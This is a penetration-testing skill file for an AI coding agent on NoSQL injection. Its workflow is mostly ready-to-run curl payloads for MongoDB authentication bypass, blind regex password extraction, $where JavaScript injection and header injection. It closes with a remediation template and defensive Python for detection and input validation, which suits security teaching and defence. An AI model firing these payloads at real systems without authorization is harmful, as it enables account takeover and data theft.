Anthropic-Cybersecurity-Skills exploiting-nosql-injection-vulnerabilities
Detect and exploit NoSQL injection vulnerabilities in MongoDB, CouchDB, and other NoSQL databases to demonstrate
install
source · Clone the upstream repo
git clone https://github.com/mukul975/Anthropic-Cybersecurity-Skills
Claude Code · Install into ~/.claude/skills/
T=$(mktemp -d) && git clone --depth=1 https://github.com/mukul975/Anthropic-Cybersecurity-Skills "$T" && mkdir -p ~/.claude/skills && cp -r "$T/skills/exploiting-nosql-injection-vulnerabilities" ~/.claude/skills/mukul975-anthropic-cybersecurity-skills-exploiting-nosql-injection-vulnerabiliti && rm -rf "$T"
manifest: skills/exploiting-nosql-injection-vulnerabilities/SKILL.md
Exploiting NoSQL Injection Vulnerabilities
When to Use
- During web application penetration testing of applications using NoSQL databases
- When testing authentication mechanisms backed by MongoDB or similar databases
- When assessing APIs that accept JSON input for database queries
- During bug bounty hunting on applications with NoSQL backends
- When performing security code review of database query construction
Prerequisites
- Burp Suite Professional or Community Edition with JSON support
- NoSQLMap tool installed (`pip install nosqlmap` or from GitHub)
- Understanding of MongoDB query operators ($ne, $gt, $regex, $where, $exists)
- Target application using a NoSQL database (MongoDB, CouchDB, Cassandra)
- Proxy configured for HTTP traffic interception
- Python 3.x for custom payload scripting
Workflow
Step 1 — Identify NoSQL Injection Points
```bash
# Look for JSON-based login forms or API endpoints
# Common indicators: application accepts JSON POST bodies, uses MongoDB
# Test with basic syntax-breaking characters
curl -X POST http://target.com/api/login \
  -H "Content-Type: application/json" \
  -d '{"username": "admin\"", "password": "test"}'

# Test for operator injection in query parameters
# (-g turns off curl's [] globbing; single quotes stop the shell expanding $ne)
curl -g 'http://target.com/api/users?username[$ne]=invalid'

# Check for error-based detection
curl -X POST http://target.com/api/search \
  -H "Content-Type: application/json" \
  -d '{"query": {"$gt": ""}}'
```
Step 2 — Perform Authentication Bypass
```bash
# Basic authentication bypass with $ne operator
curl -X POST http://target.com/api/login \
  -H "Content-Type: application/json" \
  -d '{"username": {"$ne": "invalid"}, "password": {"$ne": "invalid"}}'

# Bypass with $gt operator
curl -X POST http://target.com/api/login \
  -H "Content-Type: application/json" \
  -d '{"username": {"$gt": ""}, "password": {"$gt": ""}}'

# Target specific user with regex
curl -X POST http://target.com/api/login \
  -H "Content-Type: application/json" \
  -d '{"username": "admin", "password": {"$regex": ".*"}}'

# Bypass using $exists operator
curl -X POST http://target.com/api/login \
  -H "Content-Type: application/json" \
  -d '{"username": {"$exists": true}, "password": {"$exists": true}}'
```
Step 3 — Extract Data Using Boolean-Based Blind Injection
```bash
# Extract a field value character by character using $regex
# Test if first character of admin password is 'a'
curl -X POST http://target.com/api/login \
  -H "Content-Type: application/json" \
  -d '{"username": "admin", "password": {"$regex": "^a"}}'

# Test if first two characters are 'ab'
curl -X POST http://target.com/api/login \
  -H "Content-Type: application/json" \
  -d '{"username": "admin", "password": {"$regex": "^ab"}}'

# Enumerate usernames with regex
curl -X POST http://target.com/api/login \
  -H "Content-Type: application/json" \
  -d '{"username": {"$regex": "^adm"}, "password": {"$ne": "invalid"}}'
```
Step 4 — Exploit JavaScript Injection via $where
```bash
# JavaScript injection through $where operator
curl -X POST http://target.com/api/search \
  -H "Content-Type: application/json" \
  -d '{"$where": "this.username == \"admin\""}'

# Time-based detection with sleep
curl -X POST http://target.com/api/search \
  -H "Content-Type: application/json" \
  -d '{"$where": "sleep(5000) || this.username == \"admin\""}'

# Data exfiltration via $where with string comparison
curl -X POST http://target.com/api/search \
  -H "Content-Type: application/json" \
  -d '{"$where": "this.password.match(/^a/) != null"}'
```
Step 5 — Use NoSQLMap for Automated Testing
```bash
# Clone and set up NoSQLMap
git clone https://github.com/codingo/NoSQLMap.git
cd NoSQLMap
python setup.py install

# Run NoSQLMap against target
python nosqlmap.py -u http://target.com/api/login \
  --method POST \
  --data '{"username":"test","password":"test"}'

# Alternative: use nosqli scanner
pip install nosqli
nosqli scan -t http://target.com/api/login -d '{"username":"*","password":"*"}'
```
Step 6 — Test URL Parameter Injection
```bash
# Parameter-based injection (GET requests)
# -g turns off curl's [] globbing; single quotes stop the shell expanding $ne, $gt, ...
curl -g 'http://target.com/api/users?username[$ne]=&password[$ne]='
curl -g 'http://target.com/api/users?username[$regex]=admin&password[$gt]='
curl -g 'http://target.com/api/users?username[$exists]=true'

# Array injection via URL parameters
curl -g 'http://target.com/api/users?username[$in][]=admin&username[$in][]=root'

# Inject via HTTP headers if processed by backend
curl http://target.com/api/profile \
  -H "X-User-Id: {'\$ne': null}"
```
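Every probe in Steps 1 through 6 leaves a recognisable trace in the request: a `$`-prefixed key somewhere inside a JSON body, a `param[$op]` bracket name in a query string, or an operator token inside a header value. The Python below is an added example, not part of this skill, NoSQLMap or nosqli, that turns those traces into detection logic a defender can run over request logs. The record shape (`method`, `url`, `body`, `headers`) and the sample requests are constructed for the example and do not come from any particular proxy or server log format.

```python
"""Flag NoSQL operator-injection attempts in HTTP request records (added example)."""
import json
import re
from urllib.parse import parse_qsl, urlsplit

# Operators the probes above rely on; any other "$"-prefixed JSON key is flagged as well.
OPERATORS = ("ne", "gt", "gte", "lt", "lte", "regex", "where", "exists", "in", "nin")
BRACKET_OP = re.compile(r"\[(\$[A-Za-z]+)\]")                   # username[$ne]=...
HEADER_OP = re.compile(r"\$(" + "|".join(OPERATORS) + r")\b")   # {'$ne': null} in a header

# Constructed sample records: the (method, url, body, headers) shape is an assumption
# of this example, not a format produced by any particular proxy or web server.
SAMPLE_REQUESTS = [
    {"method": "POST", "url": "/api/login",
     "body": '{"username": "alice", "password": "hunter2"}'},
    {"method": "POST", "url": "/api/login",
     "body": '{"username": {"$ne": "invalid"}, "password": {"$ne": "invalid"}}'},
    {"method": "GET", "url": "/api/users?username[$ne]=&password[$ne]=", "body": ""},
    {"method": "POST", "url": "/api/search",
     "body": '{"$where": "this.username == \\"admin\\""}'},
    {"method": "GET", "url": "/api/profile", "body": "",
     "headers": {"X-User-Id": "{'$ne': null}"}},
    {"method": "GET", "url": "/api/users?id=42", "body": ""},
]


def operator_keys(node, path=""):
    """Yield (path, key) for every '$'-prefixed key anywhere in a parsed JSON value."""
    if isinstance(node, dict):
        for key, value in node.items():
            here = f"{path}.{key}" if path else key
            if key.startswith("$"):
                yield here, key
            yield from operator_keys(value, here)
    elif isinstance(node, list):
        for i, item in enumerate(node):
            yield from operator_keys(item, f"{path}[{i}]")


def inspect_json_body(body):
    """Operator keys in a JSON body; $where is rated high because it is server-side JS."""
    try:
        parsed = json.loads(body)
    except (ValueError, TypeError):
        return []  # empty or not JSON: nothing to inspect here
    return [{"where": "body", "path": path, "operator": key,
             "severity": "high" if key == "$where" else "medium"}
            for path, key in operator_keys(parsed)]


def inspect_query_string(url):
    """Bracket-style operators in parameter names, which some body parsers turn into objects."""
    findings = []
    for name, _value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        for op in BRACKET_OP.findall(name):
            findings.append({"where": "query", "path": name, "operator": op, "severity": "medium"})
    return findings


def inspect_headers(headers):
    """Operator tokens in header values, for backends that parse headers into filters."""
    return [{"where": "header", "path": name, "operator": "$" + m.group(1), "severity": "medium"}
            for name, value in (headers or {}).items()
            for m in HEADER_OP.finditer(value)]


def inspect_request(record):
    """All findings for one request record."""
    return (inspect_query_string(record.get("url", ""))
            + inspect_json_body(record.get("body") or "")
            + inspect_headers(record.get("headers")))


def scan(records):
    """(record index, finding) pairs across a batch of records, e.g. one log file."""
    return [(i, f) for i, r in enumerate(records) for f in inspect_request(r)]


if __name__ == "__main__":
    for index, finding in scan(SAMPLE_REQUESTS):
        r = SAMPLE_REQUESTS[index]
        print(f"#{index} {r['method']} {r['url']}: {finding}")
```

A `$`-prefixed key in a login body is never legitimate for an endpoint that expects two strings, so the body findings are near-zero-noise; the header check is the one to tune, since a `$` followed by a short word can appear in benign values.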
Key Concepts
| Concept | Description |
|---|---|
| Operator Injection | Injecting MongoDB operators ($ne, $gt, $regex) into query parameters |
| Authentication Bypass | Using operators to match any document and bypass login checks |
| Blind Extraction | Character-by-character data extraction using $regex boolean responses |
| $where Injection | Executing arbitrary JavaScript on the MongoDB server via $where operator |
| Type Juggling | Exploiting how NoSQL databases handle different input types (string vs object) |
| BSON Injection | Manipulating Binary JSON serialization in MongoDB wire protocol |
| Server-Side JS | JavaScript execution context available in MongoDB for query evaluation |
Tools & Systems
| Tool | Purpose |
|---|---|
| NoSQLMap | Automated NoSQL injection detection and exploitation framework |
| Burp Suite | HTTP proxy for intercepting and modifying JSON requests |
| MongoDB Shell | Direct database interaction for testing query behavior |
| nosqli | Dedicated NoSQL injection scanner and exploitation tool |
| PayloadsAllTheThings | Curated NoSQL injection payload repository |
| Nuclei | Template-based scanner with NoSQL injection detection templates |
| Postman | API testing platform for crafting NoSQL injection requests |
Common Scenarios
- Login Bypass — Bypass MongoDB-backed authentication using `{"$ne": ""}` operator injection in username and password fields
- Data Enumeration — Extract database contents character by character using `$regex` blind injection when no direct output is visible
- Privilege Escalation — Modify user role fields through NoSQL injection in profile update endpoints
- API Key Extraction — Extract API keys or tokens stored in MongoDB collections through boolean-based blind techniques
- Account Takeover — Enumerate valid usernames via regex injection then brute-force passwords through operator-based authentication bypass
Output Format
```markdown
## NoSQL Injection Assessment Report
- **Target**: http://target.com/api/login
- **Database**: MongoDB 6.0
- **Vulnerability Type**: Operator Injection (Authentication Bypass)
- **Severity**: Critical (CVSS 9.8)

### Vulnerable Parameters
| Endpoint | Parameter | Injection Type | Impact |
|----------|-----------|---------------|--------|
| POST /api/login | username | Operator ($ne) | Auth Bypass |
| POST /api/login | password | Regex ($regex) | Data Extraction |
| GET /api/users | id | $where JS Injection | RCE Potential |

### Proof of Concept
- Authentication bypass achieved with: {"username":{"$ne":""},"password":{"$ne":""}}
- Extracted 3 admin passwords via blind regex injection
- JavaScript execution confirmed via $where operator

### Remediation
- Use parameterized queries with MongoDB driver sanitization
- Implement input type validation (reject objects where strings expected)
- Disable server-side JavaScript execution ($where) in MongoDB config
- Apply least-privilege database access controls
```
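The first two remediation bullets come down to one rule: a credential must be a plain string before it is placed in a filter, because a MongoDB filter treats a dict value as an operator expression and a string as an equality test (the "Type Juggling" row in Key Concepts). The Python below is an added example, not this skill's code and not a MongoDB driver: a minimal evaluator for `$ne`, `$gt`, `$regex` and `$exists` stands in for MongoDB's matching over a constructed user list, `login_unsafe` forwards the request JSON unchanged, and `login_safe` rejects anything that is not a string before it reaches the filter, with a recursive `$`-key stripper as a second layer for endpoints that must accept nested documents. The user records and the function names are assumptions of the example.

```python
"""Operator injection vs. type validation in a login filter (added example)."""
import re

# Constructed stand-in for a MongoDB 'users' collection (not real credentials).
USERS = [
    {"username": "admin", "password": "s3cr3t-hash", "role": "admin"},
    {"username": "alice", "password": "wonderland", "role": "user"},
]


def _matches(stored, condition):
    """Mimic MongoDB filter matching for the operators discussed on this page.

    A dict value is an operator expression; any other value is an equality test.
    Only $ne, $gt, $regex and $exists are modelled, with string semantics."""
    if not isinstance(condition, dict):
        return stored == condition
    for op, arg in condition.items():
        if op == "$ne":
            ok = stored != arg
        elif op == "$gt":
            ok = isinstance(stored, str) and isinstance(arg, str) and stored > arg
        elif op == "$regex":
            ok = isinstance(stored, str) and re.search(arg, stored) is not None
        elif op == "$exists":
            ok = bool(arg) == (stored is not None)
        else:
            raise ValueError(f"operator not modelled: {op}")
        if not ok:
            return False
    return True


def find_one(collection, flt):
    """First document whose fields all satisfy the filter, like a driver's find_one."""
    for doc in collection:
        if all(_matches(doc.get(field), cond) for field, cond in flt.items()):
            return doc
    return None


def login_unsafe(body):
    """Vulnerable: request JSON goes straight into the filter, so an object such as
    {"$ne": ""} is evaluated as an operator expression instead of a literal value."""
    return find_one(USERS, {"username": body["username"], "password": body["password"]})


class BadRequest(ValueError):
    """Raised when a field that must be a string is something else."""


def require_str(body, field, max_len=256):
    """Type validation: reject objects, arrays, numbers and nulls where a string is expected."""
    value = body.get(field)
    if not isinstance(value, str):
        raise BadRequest(f"{field} must be a string, got {type(value).__name__}")
    if not value or len(value) > max_len:
        raise BadRequest(f"{field} has an invalid length")
    return value


def login_safe(body):
    """Hardened: credentials are validated as plain strings before the filter is built."""
    username = require_str(body, "username")
    password = require_str(body, "password")
    return find_one(USERS, {"username": username, "password": password})


def strip_operator_keys(node):
    """Second layer for nested documents: drop every '$'-prefixed key recursively,
    the approach sanitising middleware takes when an endpoint must accept objects."""
    if isinstance(node, dict):
        return {k: strip_operator_keys(v) for k, v in node.items()
                if not (isinstance(k, str) and k.startswith("$"))}
    if isinstance(node, list):
        return [strip_operator_keys(v) for v in node]
    return node


def safe_rejects(body):
    """True if the hardened login refuses the body outright."""
    try:
        login_safe(body)
    except BadRequest:
        return True
    return False


if __name__ == "__main__":
    bypass = {"username": {"$ne": ""}, "password": {"$ne": ""}}
    print("unsafe:", login_unsafe(bypass))        # first user matched, no password known
    print("safe rejects:", safe_rejects(bypass))  # True: object where a string was expected
```

Validating the type at the boundary is what makes the bypass impossible rather than merely unlikely; stripping `$` keys alone still lets the value through as an empty object, which is why the stripper is shown as a supplement rather than a replacement. The third remediation bullet, disabling server-side JavaScript, is a server configuration change and is not modelled here.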